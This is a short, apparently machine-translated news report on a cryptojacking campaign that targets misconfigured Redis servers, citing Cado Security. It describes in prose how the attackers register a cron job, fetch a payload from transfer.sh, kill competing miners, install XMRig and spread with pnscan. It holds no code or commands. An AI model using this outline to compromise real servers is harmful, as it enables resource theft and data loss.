Misconfigured database servers Redis are the aim of the new campaign cryptojackingusing a foreign file transfer service “transfer.sh” to carry out his attack.

Cloud cybersecurity firm Cado Security stated that the command-line interactivity associated with transfer.sh made it an ideal tool for hosting and delivering malicious payloads.

The attack chain begins with a search for vulnerable Redis deployments, followed by registration demon “cron”, which causes arbitrary code to be executed. The daemon is designed to receive the payload hosted on transfer.sh.

It is worth noting that similar attack mechanisms have been used by other attackers such as TeamTNT and WatchDog in their cryptojacking operations.

Payload is a script that downloads and activates the cryptocurrency miner XMRig. But not before preparatory steps are taken to free up memory, stop competing miners, and install a network scanning utility called pnscan to find vulnerable Redis servers and distribute malware.

“While it is clear that the goal of this campaign is to seize system resources for cryptocurrency mining, infection with this malware can have unforeseen consequences,” the company said. “The ill-conceived configuration of Linux memory management systems can easily lead to data corruption or loss of system availability.”

Previously, vulnerabilities in Redis servers were exploited by malware Redigo And HeadCrab .